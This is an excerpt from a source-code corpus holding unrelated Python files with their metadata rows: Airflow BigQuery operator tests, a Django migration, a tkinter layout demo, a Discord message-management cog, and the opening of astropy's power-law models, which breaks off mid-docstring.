@mock.patch('airflow.providers.google.cloud.operators.bigquery.BigQueryHook')
def test_execute(self, mock_hook):
schema_field_updates = [
{
'name': 'emp_name',
'description': 'Name of employee',
}
]
operator = BigQueryUpdateTableSchemaOperator(
schema_fields_updates=schema_field_updates,
include_policy_tags=False,
task_id=TASK_ID,
dataset_id=TEST_DATASET,
table_id=TEST_TABLE_ID,
project_id=TEST_GCP_PROJECT_ID,
)
operator.execute(None)
mock_hook.return_value.update_table_schema.assert_called_once_with(
schema_fields_updates=schema_field_updates,
include_policy_tags=False,
dataset_id=TEST_DATASET,
table_id=TEST_TABLE_ID,
project_id=TEST_GCP_PROJECT_ID,
)
class TestBigQueryPatchDatasetOperator(unittest.TestCase):
@mock.patch('airflow.providers.google.cloud.operators.bigquery.BigQueryHook')
def test_execute(self, mock_hook):
dataset_resource = {"friendlyName": 'Test DS'}
operator = BigQueryPatchDatasetOperator(
dataset_resource=dataset_resource,
task_id=TASK_ID,
dataset_id=TEST_DATASET,
project_id=TEST_GCP_PROJECT_ID,
)
operator.execute(None)
mock_hook.return_value.patch_dataset.assert_called_once_with(
dataset_resource=dataset_resource, dataset_id=TEST_DATASET, project_id=TEST_GCP_PROJECT_ID
)
class TestBigQueryUpdateDatasetOperator(unittest.TestCase):
@mock.patch('airflow.providers.google.cloud.operators.bigquery.BigQueryHook')
def test_execute(self, mock_hook):
dataset_resource = {"friendlyName": 'Test DS'}
operator = BigQueryUpdateDatasetOperator(
dataset_resource=dataset_resource,
task_id=TASK_ID,
dataset_id=TEST_DATASET,
project_id=TEST_GCP_PROJECT_ID,
)
operator.execute(None)
mock_hook.return_value.update_dataset.assert_called_once_with(
dataset_resource=dataset_resource,
dataset_id=TEST_DATASET,
project_id=TEST_GCP_PROJECT_ID,
fields=list(dataset_resource.keys()),
)
class TestBigQueryOperator:
def teardown_method(self):
clear_db_xcom()
clear_db_runs()
clear_db_serialized_dags()
clear_db_dags()
@mock.patch('airflow.providers.google.cloud.operators.bigquery.BigQueryHook')
def test_execute(self, mock_hook):
encryption_configuration = {'key': 'kk'}
operator = BigQueryExecuteQueryOperator(
task_id=TASK_ID,
sql='Select * from test_table',
destination_dataset_table=None,
write_disposition='WRITE_EMPTY',
allow_large_results=False,
flatten_results=None,
gcp_conn_id='google_cloud_default',
udf_config=None,
use_legacy_sql=True,
maximum_billing_tier=None,
maximum_bytes_billed=None,
create_disposition='CREATE_IF_NEEDED',
schema_update_options=(),
query_params=None,
labels=None,
priority='INTERACTIVE',
time_partitioning=None,
api_resource_configs=None,
cluster_fields=None,
encryption_configuration=encryption_configuration,
)
operator.execute(MagicMock())
mock_hook.return_value.run_query.assert_called_once_with(
sql='Select * from test_table',
destination_dataset_table=None,
write_disposition='WRITE_EMPTY',
allow_large_results=False,
flatten_results=None,
udf_config=None,
maximum_billing_tier=None,
maximum_bytes_billed=None,
create_disposition='CREATE_IF_NEEDED',
schema_update_options=(),
query_params=None,
labels=None,
priority='INTERACTIVE',
time_partitioning=None,
api_resource_configs=None,
cluster_fields=None,
encryption_configuration=encryption_configuration,
)
@mock.patch('airflow.providers.google.cloud.operators.bigquery.BigQueryHook')
def test_execute_list(self, mock_hook):
operator = BigQueryExecuteQueryOperator(
task_id=TASK_ID,
sql=[
'Select * from test_table',
'Select * from other_test_table',
],
destination_dataset_table=None,
write_disposition='WRITE_EMPTY',
allow_large_results=False,
flatten_results=None,
gcp_conn_id='google_cloud_default',
udf_config=None,
use_legacy_sql=True,
maximum_billing_tier=None,
maximum_bytes_billed=None,
create_disposition='CREATE_IF_NEEDED',
schema_update_options=(),
query_params=None,
labels=None,
priority='INTERACTIVE',
time_partitioning=None,
api_resource_configs=None,
cluster_fields=None,
encryption_configuration=None,
)
operator.execute(MagicMock())
mock_hook.return_value.run_query.assert_has_calls(
[
mock.call(
sql='Select * from test_table',
destination_dataset_table=None,
write_disposition='WRITE_EMPTY',
allow_large_results=False,
flatten_results=None,
udf_config=None,
maximum_billing_tier=None,
maximum_bytes_billed=None,
create_disposition='CREATE_IF_NEEDED',
schema_update_options=(),
query_params=None,
labels=None,
priority='INTERACTIVE',
time_partitioning=None,
api_resource_configs=None,
cluster_fields=None,
encryption_configuration=None,
),
mock.call(
sql='Select * from other_test_table',
destination_dataset_table=None,
write_disposition='WRITE_EMPTY',
allow_large_results=False,
flatten_results=None,
udf_config=None,
maximum_billing_tier=None,
maximum_bytes_billed=None,
create_disposition='CREATE_IF_NEEDED',
schema_update_options=(),
query_params=None,
labels=None,
priority='INTERACTIVE',
time_partitioning=None,
api_resource_configs=None,
cluster_fields=None,
encryption_configuration=None,
),
]
)
@mock.patch('airflow.providers.google.cloud.operators.bigquery.BigQueryHook')
def test_execute_bad_type(self, mock_hook):
operator = BigQueryExecuteQueryOperator(
task_id=TASK_ID,
sql=1,
destination_dataset_table=None,
write_disposition='WRITE_EMPTY',
allow_large_results=False,
flatten_results=None,
gcp_conn_id='google_cloud_default',
udf_config=None,
use_legacy_sql=True,
maximum_billing_tier=None,
maximum_bytes_billed=None,
create_disposition='CREATE_IF_NEEDED',
schema_update_options=(),
query_params=None,
labels=None,
priority='INTERACTIVE',
time_partitioning=None,
api_resource_configs=None,
cluster_fields=None,
)
with pytest.raises(AirflowException):
operator.execute(MagicMock())
@mock.patch('airflow.providers.google.cloud.operators.bigquery.BigQueryHook')
def test_bigquery_operator_defaults(self, mock_hook, create_task_instance_of_operator):
ti = create_task_instance_of_operator(
BigQueryExecuteQueryOperator,
dag_id=TEST_DAG_ID,
task_id=TASK_ID,
sql='Select * from test_table',
schema_update_options=None,
)
operator = ti.task
operator.execute(MagicMock())
mock_hook.return_value.run_query.assert_called_once_with(
sql='Select * from test_table',
destination_dataset_table=None,
write_disposition='WRITE_EMPTY',
allow_large_results=False,
flatten_results=None,
udf_config=None,
maximum_billing_tier=None,
maximum_bytes_billed=None,
create_disposition='CREATE_IF_NEEDED',
schema_update_options=None,
query_params=None,
labels=None,
priority='INTERACTIVE',
time_partitioning=None,
api_resource_configs=None,
cluster_fields=None,
encryption_configuration=None,
)
assert isinstance(operator.sql, str)
ti.render_templates()
assert isinstance(ti.task.sql, str)
@pytest.mark.need_serialized_dag
def test_bigquery_operator_extra_serialized_field_when_single_query(
self,
dag_maker,
create_task_instance_of_operator,
):
ti = create_task_instance_of_operator(
BigQueryExecuteQueryOperator,
dag_id=TEST_DAG_ID,
execution_date=DEFAULT_DATE,
task_id=TASK_ID,
sql='SELECT * FROM test_table',
)
serialized_dag = dag_maker.get_serialized_data()
assert "sql" in serialized_dag["dag"]["tasks"][0]
dag = SerializedDAG.from_dict(serialized_dag)
simple_task = dag.task_dict[TASK_ID]
assert getattr(simple_task, "sql") == 'SELECT * FROM test_table'
#########################################################
# Verify Operator Links work with Serialized Operator
#########################################################
# Check Serialized version of operator link
assert serialized_dag["dag"]["tasks"][0]["_operator_extra_links"] == [
{'airflow.providers.google.cloud.operators.bigquery.BigQueryConsoleLink': {}}
]
# Check DeSerialized version of operator link
assert isinstance(list(simple_task.operator_extra_links)[0], BigQueryConsoleLink)
ti.xcom_push('job_id', 12345)
url = simple_task.get_extra_links(ti, BigQueryConsoleLink.name)
assert url == 'https://console.cloud.google.com/bigquery?j=12345'
@pytest.mark.need_serialized_dag
def test_bigquery_operator_extra_serialized_field_when_multiple_queries(
self,
dag_maker,
create_task_instance_of_operator,
):
ti = create_task_instance_of_operator(
BigQueryExecuteQueryOperator,
dag_id=TEST_DAG_ID,
execution_date=DEFAULT_DATE,
task_id=TASK_ID,
sql=['SELECT * FROM test_table', 'SELECT * FROM test_table2'],
)
serialized_dag = dag_maker.get_serialized_data()
assert "sql" in serialized_dag["dag"]["tasks"][0]
dag = SerializedDAG.from_dict(serialized_dag)
simple_task = dag.task_dict[TASK_ID]
assert getattr(simple_task, "sql") == ['SELECT * FROM test_table', 'SELECT * FROM test_table2']
#########################################################
# Verify Operator Links work with Serialized Operator
#########################################################
# Check Serialized version of operator link
assert serialized_dag["dag"]["tasks"][0]["_operator_extra_links"] == [
{'airflow.providers.google.cloud.operators.bigquery.BigQueryConsoleIndexableLink': {'index': 0}},
{'airflow.providers.google.cloud.operators.bigquery.BigQueryConsoleIndexableLink': {'index': 1}},
]
# Check DeSerialized version of operator link
assert isinstance(list(simple_task.operator_extra_links)[0], BigQueryConsoleIndexableLink)
job_id = ['123', '45']
ti.xcom_push(key='job_id', value=job_id)
assert {'BigQuery Console #1', 'BigQuery Console #2'} == simple_task.operator_extra_link_dict.keys()
assert 'https://console.cloud.google.com/bigquery?j=123' == simple_task.get_extra_links(
ti, 'BigQuery Console #1'
)
assert 'https://console.cloud.google.com/bigquery?j=45' == simple_task.get_extra_links(
ti, 'BigQuery Console #2'
)
@mock.patch('airflow.providers.google.cloud.operators.bigquery.BigQueryHook')
def test_bigquery_operator_extra_link_when_missing_job_id(
self, mock_hook, create_task_instance_of_operator
):
ti = create_task_instance_of_operator(
BigQueryExecuteQueryOperator,
dag_id=TEST_DAG_ID,
task_id=TASK_ID,
sql='SELECT * FROM test_table',
)
bigquery_task = ti.task
assert '' == bigquery_task.get_extra_links(ti, BigQueryConsoleLink.name)
@mock.patch('airflow.providers.google.cloud.operators.bigquery.BigQueryHook')
def test_bigquery_operator_extra_link_when_single_query(
self, mock_hook, create_task_instance_of_operator
):
ti = create_task_instance_of_operator(
BigQueryExecuteQueryOperator,
dag_id=TEST_DAG_ID,
execution_date=DEFAULT_DATE,
task_id=TASK_ID,
sql='SELECT * FROM test_table',
)
bigquery_task = ti.task
job_id = '12345'
ti.xcom_push(key='job_id', value=job_id)
assert f'https://console.cloud.google.com/bigquery?j={job_id}' == bigquery_task.get_extra_links(
ti, BigQueryConsoleLink.name
)
@mock.patch('airflow.providers.google.cloud.operators.bigquery.BigQueryHook')
def test_bigquery_operator_extra_link_when_multiple_query(
self, mock_hook, create_task_instance_of_operator
):
ti = create_task_instance_of_operator(
BigQueryExecuteQueryOperator,
dag_id=TEST_DAG_ID,
execution_date=DEFAULT_DATE,
task_id=TASK_ID,
sql=['SELECT * FROM test_table', 'SELECT * FROM test_table2'],
)
bigquery_task = ti.task
job_id = ['123', '45']
ti.xcom_push(key='job_id', value=job_id)
assert {'BigQuery Console #1', 'BigQuery Console #2'} == bigquery_task.operator_extra_link_dict.keys()
assert 'https://console.cloud.google.com/bigquery?j=123' == bigquery_task.get_extra_links(
ti, 'BigQuery Console #1'
)
assert 'https://console.cloud.google.com/bigquery?j=45' == bigquery_task.get_extra_links(
ti, 'BigQuery Console #2'
)
class TestBigQueryGetDataOperator(unittest.TestCase):
@mock.patch('airflow.providers.google.cloud.operators.bigquery.BigQueryHook')
def test_execute(self, mock_hook):
max_results = 100
selected_fields = 'DATE'
operator = BigQueryGetDataOperator(
task_id=TASK_ID,
dataset_id=TEST_DATASET,
table_id=TEST_TABLE_ID,
max_results=max_results,
selected_fields=selected_fields,
location=TEST_DATASET_LOCATION,
)
operator.execute(None)
mock_hook.return_value.list_rows.assert_called_once_with(
dataset_id=TEST_DATASET,
table_id=TEST_TABLE_ID,
max_results=max_results,
selected_fields=selected_fields,
location=TEST_DATASET_LOCATION,
)
class TestBigQueryTableDeleteOperator(unittest.TestCase):
@mock.patch('airflow.providers.google.cloud.operators.bigquery.BigQueryHook')
def test_execute(self, mock_hook):
ignore_if_missing = True
deletion_dataset_table = f'{TEST_DATASET}.{TEST_TABLE_ID}'
operator = BigQueryDeleteTableOperator(
task_id=TASK_ID,
deletion_dataset_table=deletion_dataset_table,
ignore_if_missing=ignore_if_missing,
)
operator.execute(None)
mock_hook.return_value.delete_table.assert_called_once_with(
table_id=deletion_dataset_table, not_found_ok=ignore_if_missing
)
class TestBigQueryGetDatasetTablesOperator(unittest.TestCase):
@mock.patch('airflow.providers.google.cloud.operators.bigquery.BigQueryHook')
def test_execute(self, mock_hook):
operator = BigQueryGetDatasetTablesOperator(
task_id=TASK_ID, dataset_id=TEST_DATASET, project_id=TEST_GCP_PROJECT_ID, max_results=2
)
operator.execute(None)
mock_hook.return_value.get_dataset_tables.assert_called_once_with(
dataset_id=TEST_DATASET,
project_id=TEST_GCP_PROJECT_ID,
max_results=2,
)
@pytest.mark.parametrize(
"operator_class, kwargs",
[
(BigQueryCheckOperator, dict(sql='Select * from test_table')),
(BigQueryValueCheckOperator, dict(sql='Select * from test_table', pass_value=95)),
(BigQueryIntervalCheckOperator, dict(table=TEST_TABLE_ID, metrics_thresholds={'COUNT(*)': 1.5})),
],
)
class TestBigQueryCheckOperators:
@mock.patch("airflow.providers.google.cloud.operators.bigquery._BigQueryDbHookMixin.get_db_hook")
def test_get_db_hook(
self,
mock_get_db_hook,
operator_class,
kwargs,
):
operator = operator_class(task_id=TASK_ID, gcp_conn_id='google_cloud_default', **kwargs)
operator.get_db_hook()
mock_get_db_hook.assert_called_once()
class TestBigQueryConnIdDeprecationWarning:
@pytest.mark.parametrize(
"operator_class, kwargs",
[
(BigQueryCheckOperator, dict(sql='Select * from test_table')),
(BigQueryValueCheckOperator, dict(sql='Select * from test_table', pass_value=95)),
(BigQueryIntervalCheckOperator, dict(table=TEST_TABLE_ID, metrics_thresholds={'COUNT(*)': 1.5})),
(BigQueryGetDataOperator, dict(dataset_id=TEST_DATASET, table_id=TEST_TABLE_ID)),
(BigQueryExecuteQueryOperator, dict(sql='Select * from test_table')),
(BigQueryDeleteDatasetOperator, dict(dataset_id=TEST_DATASET)),
(BigQueryCreateEmptyDatasetOperator, dict(dataset_id=TEST_DATASET)),
(BigQueryDeleteTableOperator, dict(deletion_dataset_table=TEST_DATASET)),
],
)
def test_bigquery_conn_id_deprecation_warning(self, operator_class, kwargs):
bigquery_conn_id = 'google_cloud_default'
with pytest.warns(
DeprecationWarning,
match=(
"The bigquery_conn_id parameter has been deprecated. "
"You should pass the gcp_conn_id parameter."
),
):
operator = operator_class(task_id=TASK_ID, bigquery_conn_id=bigquery_conn_id, **kwargs)
assert bigquery_conn_id == operator.gcp_conn_id
class TestBigQueryUpsertTableOperator(unittest.TestCase):
@mock.patch('airflow.providers.google.cloud.operators.bigquery.BigQueryHook')
def test_execute(self, mock_hook):
operator = BigQueryUpsertTableOperator(
task_id=TASK_ID,
dataset_id=TEST_DATASET,
table_resource=TEST_TABLE_RESOURCES,
project_id=TEST_GCP_PROJECT_ID,
)
operator.execute(None)
mock_hook.return_value.run_table_upsert.assert_called_once_with(
dataset_id=TEST_DATASET, project_id=TEST_GCP_PROJECT_ID, table_resource=TEST_TABLE_RESOURCES
)
class TestBigQueryInsertJobOperator:
@mock.patch('airflow.providers.google.cloud.operators.bigquery.hashlib.md5')
@mock.patch('airflow.providers.google.cloud.operators.bigquery.BigQueryHook')
def test_execute_success(self, mock_hook, mock_md5):
job_id = "123456"
hash_ = "hash"
real_job_id = f"{job_id}_{hash_}"
mock_md5.return_value.hexdigest.return_value = hash_
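        # The operator builds the effective job id by appending an md5-derived suffix to the
        # supplied job_id, so the hash is mocked here to keep the expected id deterministic.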
configuration = {
"query": {
"query": "SELECT * FROM any",
"useLegacySql": False,
}
}
mock_hook.return_value.insert_job.return_value = MagicMock(job_id=real_job_id, error_result=False)
op = BigQueryInsertJobOperator(
task_id="insert_query_job",
configuration=configuration,
location=TEST_DATASET_LOCATION,
job_id=job_id,
project_id=TEST_GCP_PROJECT_ID,
)
result = op.execute({})
mock_hook.return_value.insert_job.assert_called_once_with(
configuration=configuration,
location=TEST_DATASET_LOCATION,
job_id=real_job_id,
project_id=TEST_GCP_PROJECT_ID,
)
assert result == real_job_id
@mock.patch('airflow.providers.google.cloud.operators.bigquery.hashlib.md5')
@mock.patch('airflow.providers.google.cloud.operators.bigquery.BigQueryHook')
def test_on_kill(self, mock_hook, mock_md5):
job_id = "123456"
hash_ = "hash"
real_job_id = f"{job_id}_{hash_}"
mock_md5.return_value.hexdigest.return_value = hash_
configuration = {
"query": {
"query": "SELECT * FROM any",
"useLegacySql": False,
}
}
mock_hook.return_value.insert_job.return_value = MagicMock(job_id=real_job_id, error_result=False)
op = BigQueryInsertJobOperator(
task_id="insert_query_job",
configuration=configuration,
location=TEST_DATASET_LOCATION,
job_id=job_id,
project_id=TEST_GCP_PROJECT_ID,
cancel_on_kill=False,
)
op.execute({})
op.on_kill()
mock_hook.return_value.cancel_job.assert_not_called()
op.cancel_on_kill = True
op.on_kill()
mock_hook.return_value.cancel_job.assert_called_once_with(
job_id=real_job_id,
location=TEST_DATASET_LOCATION,
project_id=TEST_GCP_PROJECT_ID,
)
@mock.patch('airflow.providers.google.cloud.operators.bigquery.hashlib.md5')
@mock.patch('airflow.providers.google.cloud.operators.bigquery.BigQueryHook')
def test_execute_failure(self, mock_hook, mock_md5):
job_id = "123456"
hash_ = "hash"
real_job_id = f"{job_id}_{hash_}"
mock_md5.return_value.hexdigest.return_value = hash_
configuration = {
"query": {
"query": "SELECT * FROM any",
"useLegacySql": False,
}
}
mock_hook.return_value.insert_job.return_value = MagicMock(job_id=real_job_id, error_result=True)
op = BigQueryInsertJobOperator(
task_id="insert_query_job",
configuration=configuration,
location=TEST_DATASET_LOCATION,
job_id=job_id,
project_id=TEST_GCP_PROJECT_ID,
)
with pytest.raises(AirflowException):
op.execute({})
@mock.patch('airflow.providers.google.cloud.operators.bigquery.hashlib.md5')
@mock.patch('airflow.providers.google.cloud.operators.bigquery.BigQueryHook')
def test_execute_reattach(self, mock_hook, mock_md5):
job_id = "123456"
hash_ = "hash"
real_job_id = f"{job_id}_{hash_}"
mock_md5.return_value.hexdigest.return_value = hash_
configuration = {
"query": {
"query": "SELECT * FROM any",
"useLegacySql": False,
}
}
mock_hook.return_value.insert_job.side_effect = Conflict("any")
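        # Simulate a job-id collision: insert_job raises Conflict, which should make the
        # operator look up the existing job and reattach to it instead of failing.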
job = MagicMock(
job_id=real_job_id,
error_result=False,
state="PENDING",
done=lambda: False,
)
mock_hook.return_value.get_job.return_value = job
op = BigQueryInsertJobOperator(
task_id="insert_query_job",
configuration=configuration,
location=TEST_DATASET_LOCATION,
job_id=job_id,
project_id=TEST_GCP_PROJECT_ID,
reattach_states={"PENDING"},
)
result = op.execute({})
mock_hook.return_value.get_job.assert_called_once_with(
location=TEST_DATASET_LOCATION,
job_id=real_job_id,
project_id=TEST_GCP_PROJECT_ID,
)
job.result.assert_called_once_with()
assert result == real_job_id
@mock.patch('airflow.providers.google.cloud.operators.bigquery.hashlib.md5')
@mock.patch('airflow.providers.google.cloud.operators.bigquery.uuid')
@mock.patch('airflow.providers.google.cloud.operators.bigquery.BigQueryHook')
def test_execute_force_rerun(self, mock_hook, mock_uuid, mock_md5):
job_id = "123456"
hash_ = mock_uuid.uuid4.return_value.encode.return_value
real_job_id = f"{job_id}_{hash_}"
mock_md5.return_value.hexdigest.return_value = hash_
configuration = {
"query": {
"query": "SELECT * FROM any",
"useLegacySql": False,
}
}
job = MagicMock(
job_id=real_job_id,
error_result=False,
)
mock_hook.return_value.insert_job.return_value = job
op = BigQueryInsertJobOperator(
task_id="insert_query_job",
configuration=configuration,
location=TEST_DATASET_LOCATION,
job_id=job_id,
project_id=TEST_GCP_PROJECT_ID,
force_rerun=True,
)
result = op.execute({})
mock_hook.return_value.insert_job.assert_called_once_with(
configuration=configuration,
location=TEST_DATASET_LOCATION,
job_id=real_job_id,
project_id=TEST_GCP_PROJECT_ID,
)
assert result == real_job_id
@mock.patch('airflow.providers.google.cloud.operators.bigquery.hashlib.md5')
@mock.patch('airflow.providers.google.cloud.operators.bigquery.BigQueryHook')
def test_execute_no_force_rerun(self, mock_hook, mock_md5):
job_id = "123456"
hash_ = "hash"
real_job_id = f"{job_id}_{hash_}"
mock_md5.return_value.hexdigest.return_value = hash_
configuration = {
"query": {
"query": "SELECT * FROM any",
"useLegacySql": False,
}
}
mock_hook.return_value.insert_job.return_value.result.side_effect = Conflict("any")
job = MagicMock(
job_id=real_job_id,
error_result=False,
state="DONE",
done=lambda: True,
)
mock_hook.return_value.get_job.return_value = job
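        # The pre-existing job is already DONE, which is not in reattach_states, so without
        # force_rerun the operator is expected to raise instead of reattaching.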
op = BigQueryInsertJobOperator(
task_id="insert_query_job",
configuration=configuration,
location=TEST_DATASET_LOCATION,
job_id=job_id,
project_id=TEST_GCP_PROJECT_ID,
reattach_states={"PENDING"},
)
# No force rerun
with pytest.raises(AirflowException):
op.execute({})
@mock.patch('airflow.providers.google.cloud.operators.bigquery.hashlib.md5')
@pytest.mark.parametrize(
"test_dag_id, expected_job_id",
[("test-dag-id-1.1", "airflow_test_dag_id_1_1_test_job_id_2020_01_23T00_00_00_00_00_hash")],
ids=["test-dag-id-1.1"],
)
def test_job_id_validity(self, mock_md5, test_dag_id, expected_job_id):
hash_ = "hash"
mock_md5.return_value.hexdigest.return_value = hash_
context = {"execution_date": datetime(2020, 1, 23)}
configuration = {
"query": {
"query": "SELECT * FROM any",
"useLegacySql": False,
}
}
with DAG(dag_id=test_dag_id, start_date=datetime(2020, 1, 23)):
op = BigQueryInsertJobOperator(
task_id="test_job_id", configuration=configuration, project_id=TEST_GCP_PROJECT_ID
)
assert op._job_id(context) == expected_job_id
| 37.254753 | 110 | 0.640794 | [
"Apache-2.0"
] | 094459/airflow | tests/providers/google/cloud/operators/test_bigquery.py | 39,192 | Python |
# Generated by Django 2.2.12 on 2020-11-10 19:36
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('core', '0039_auto_20201110_2132'),
]
operations = [
migrations.AlterField(
model_name='profile',
name='address_1',
field=models.CharField(default='', help_text='Address 1', max_length=500),
preserve_default=False,
),
migrations.AlterField(
model_name='profile',
name='address_2',
field=models.CharField(default='es', help_text='Address 2', max_length=500),
preserve_default=False,
),
]
| 26.576923 | 88 | 0.591896 | [
"MPL-2.0",
"MPL-2.0-no-copyleft-exception"
] | EslamRM/Eshhnli | core/migrations/0040_auto_20201110_2136.py | 691 | Python |
""" http://www.python-course.eu/tkinter_layout_management.php """
from tkinter import *
root = Tk()
w = Label(root, text="Red Sun", bg="red", fg="white")
w.pack()
w = Label(root, text="Green Grass", bg="green", fg="black")
w.pack(ipadx=10)
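# ipadx=10 adds 10 pixels of internal horizontal padding inside the label,
# so this widget is drawn wider than the two labels packed without it.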
w = Label(root, text="Blue Sky", bg="blue", fg="white")
w.pack()
mainloop()
| 28.727273 | 65 | 0.651899 | [
"Apache-2.0"
] | modal/tktoolbox | tktoolbox/examples/layout/pack_ipadx.py | 316 | Python |
"""This is a python module containing a cog that implements commands that are
used to manage messages in the server.
e.g. "clear", delete all instances of a certain word, etc.
"""
import discord
from discord.ext import commands
import typing # For optional parameters.
import datetime # For comparing messages.
class Message_Management(commands.Cog):
def __init__(self, client):
self._client = client
self._anchors = {}
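        # Maps channel ID -> message ID of the anchor currently set in that channel.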
@commands.command(aliases = ["c"])
async def clear(self, ctx, amount: int = 5):
"""Clear AMOUNT messages from chat. Default is 5. Also deletes
the message that invoked this command.
Usage: "clear <amount>"
"""
# Delete the message that invoked this command.
await ctx.message.delete()
# Delete AMOUNT more messages.
await ctx.channel.purge(limit=amount)
@commands.command(aliases = ["cfu", "clear_user"])
async def clear_from_user(self, ctx, amount: typing.Optional[int]=5, *, username):
"""Clear AMOUNT messages from a specific user. Also deletes the message
that invoked this command.
        Usage: "clear_from_user <amount> <username>"
Username is the discord username, not server nickname.
"""
# To keep track of how many messages we're searching through.
msgsSearched = 0
remaining = amount
# Delete the message that invoked this command.
await ctx.message.delete()
# Delete AMOUNT more messages from the user.
# Limit it to 1000 messages to prevent this from going on too long.
async for message in ctx.channel.history(limit=1000):
msgsSearched += 1
if message.author.name == username:
await message.delete()
remaining -= 1
if remaining == 0:
break
else:
            await ctx.send(f"There were fewer than {amount} messages from {username} in the last {msgsSearched} messages.")
@commands.command(aliases=["adm"])
    async def anchor_delete_manual(self, ctx):
        """On first use, mark the invoking message as an anchor; on second use in the same
        channel, delete every message between the two anchor commands (inclusive)."""
# Check if the current channel already has an anchor.
if ctx.channel.id in self._anchors:
# Delete every message between the invocation message
# and the anchor.
async for message in ctx.channel.history(limit=None):
if message.id == self._anchors[ctx.channel.id]:
await message.delete() # Delete the message.
del self._anchors[ctx.channel.id] # Remove the anchor.
# Break from the loop, since we are done deleting.
break
else:
await message.delete()
        else:  # No anchor yet in this channel: record this message as the anchor.
self._anchors[ctx.channel.id] = ctx.message.id
@commands.command(aliases=["adc"])
async def anchor_delete_choice(self, ctx, bottom: int, top: int):
"""Given the message ID's for two messages, delete all messages between them."""
# Fetch the two messages.
bottom_msg = await ctx.channel.fetch_message(bottom)
top_msg = await ctx.channel.fetch_message(top)
# Compare the messages to ensure the bottom anchor is younger.
if not bottom_msg.created_at > top_msg.created_at:
await ctx.send("Bottom anchor must come after top anchor.")
return # End the function.
# If that check passed, delete every message between the two.
anchored = False
num_deleted = 0
async for message in ctx.channel.history(limit=None):
# Start the deletion if we find the bottom anchor.
if message.id == bottom:
anchored = True
await message.delete()
num_deleted += 1
continue
if anchored:
num_deleted += 1
await message.delete()
if message.id == top: # If we find the top anchor, stop deleting.
anchored = False
break
# After deleting, print out how many messages were deleted,
# and delete the invocation message.
await ctx.send(f"Deleted {num_deleted} messages.")
await ctx.message.delete()
def setup(client):
client.add_cog(Message_Management(client))
| 40.176991 | 123 | 0.59141 | [
"MIT"
] | ThomScottW/DiscordBot | cogs/Message Management.py | 4,540 | Python |
# Licensed under a 3-clause BSD style license - see LICENSE.rst
"""
Power law model variants
"""
# pylint: disable=invalid-name
import numpy as np
from astropy.units import Quantity
from .core import Fittable1DModel
from .parameters import InputParameterError, Parameter
__all__ = ['PowerLaw1D', 'BrokenPowerLaw1D', 'SmoothlyBrokenPowerLaw1D',
'ExponentialCutoffPowerLaw1D', 'LogParabola1D', 'Schechter1D']
class PowerLaw1D(Fittable1DModel):
"""
One dimensional power law model.
Parameters
----------
amplitude : float
Model amplitude at the reference point
x_0 : float
Reference point
alpha : float
Power law index
See Also
--------
BrokenPowerLaw1D, ExponentialCutoffPowerLaw1D, LogParabola1D
Notes
-----
Model formula (with :math:`A` for ``amplitude`` and :math:`\\alpha` for ``alpha``):
.. math:: f(x) = A (x / x_0) ^ {-\\alpha}
"""
amplitude = Parameter(default=1, description="Peak value at the reference point")
x_0 = Parameter(default=1, description="Reference point")
alpha = Parameter(default=1, description="Power law index")
@staticmethod
def evaluate(x, amplitude, x_0, alpha):
"""One dimensional power law model function"""
xx = x / x_0
return amplitude * xx ** (-alpha)
@staticmethod
def fit_deriv(x, amplitude, x_0, alpha):
"""One dimensional power law derivative with respect to parameters"""
xx = x / x_0
d_amplitude = xx ** (-alpha)
d_x_0 = amplitude * alpha * d_amplitude / x_0
d_alpha = -amplitude * d_amplitude * np.log(xx)
return [d_amplitude, d_x_0, d_alpha]
@property
def input_units(self):
if self.x_0.unit is None:
return None
return {self.inputs[0]: self.x_0.unit}
def _parameter_units_for_data_units(self, inputs_unit, outputs_unit):
return {'x_0': inputs_unit[self.inputs[0]],
'amplitude': outputs_unit[self.outputs[0]]}
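# Illustrative usage sketch (added for clarity; not part of the original astropy module):
# evaluating a PowerLaw1D instance applies f(x) = amplitude * (x / x_0) ** -alpha directly.
#
#     from astropy.modeling.models import PowerLaw1D
#     pl = PowerLaw1D(amplitude=10, x_0=1, alpha=2)
#     pl(2.0)   # 10 * (2 / 1) ** -2 = 2.5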
class BrokenPowerLaw1D(Fittable1DModel):
"""
One dimensional power law model with a break.
Parameters
----------
amplitude : float
Model amplitude at the break point.
x_break : float
Break point.
alpha_1 : float
Power law index for x < x_break.
alpha_2 : float
Power law index for x > x_break.
See Also
--------
PowerLaw1D, ExponentialCutoffPowerLaw1D, LogParabola1D
Notes
-----
Model formula (with :math:`A` for ``amplitude`` and :math:`\\alpha_1`
for ``alpha_1`` and :math:`\\alpha_2` for ``alpha_2``):
.. math::
f(x) = \\left \\{
\\begin{array}{ll}
A (x / x_{break}) ^ {-\\alpha_1} & : x < x_{break} \\\\
A (x / x_{break}) ^ {-\\alpha_2} & : x > x_{break} \\\\
\\end{array}
\\right.
"""
amplitude = Parameter(default=1, description="Peak value at break point")
x_break = Parameter(default=1, description="Break point")
alpha_1 = Parameter(default=1, description="Power law index before break point")
alpha_2 = Parameter(default=1, description="Power law index after break point")
@staticmethod
def evaluate(x, amplitude, x_break, alpha_1, alpha_2):
"""One dimensional broken power law model function"""
alpha = np.where(x < x_break, alpha_1, alpha_2)
xx = x / x_break
return amplitude * xx ** (-alpha)
@staticmethod
def fit_deriv(x, amplitude, x_break, alpha_1, alpha_2):
"""One dimensional broken power law derivative with respect to parameters"""
alpha = np.where(x < x_break, alpha_1, alpha_2)
xx = x / x_break
d_amplitude = xx ** (-alpha)
d_x_break = amplitude * alpha * d_amplitude / x_break
d_alpha = -amplitude * d_amplitude * np.log(xx)
d_alpha_1 = np.where(x < x_break, d_alpha, 0)
d_alpha_2 = np.where(x >= x_break, d_alpha, 0)
return [d_amplitude, d_x_break, d_alpha_1, d_alpha_2]
@property
def input_units(self):
if self.x_break.unit is None:
return None
return {self.inputs[0]: self.x_break.unit}
def _parameter_units_for_data_units(self, inputs_unit, outputs_unit):
return {'x_break': inputs_unit[self.inputs[0]],
'amplitude': outputs_unit[self.outputs[0]]}
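# Illustrative usage sketch (added for clarity; not part of the original astropy module):
# the broken power law switches index at x_break, as the two evaluations below show.
#
#     from astropy.modeling.models import BrokenPowerLaw1D
#     bpl = BrokenPowerLaw1D(amplitude=1, x_break=10, alpha_1=1, alpha_2=2)
#     bpl(5.0)    # 1 * (5 / 10) ** -1 = 2.0  (below the break, index alpha_1)
#     bpl(20.0)   # 1 * (20 / 10) ** -2 = 0.25  (above the break, index alpha_2)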
class SmoothlyBrokenPowerLaw1D(Fittable1DModel):
"""One dimensional smoothly broken power law model.
Parameters
----------
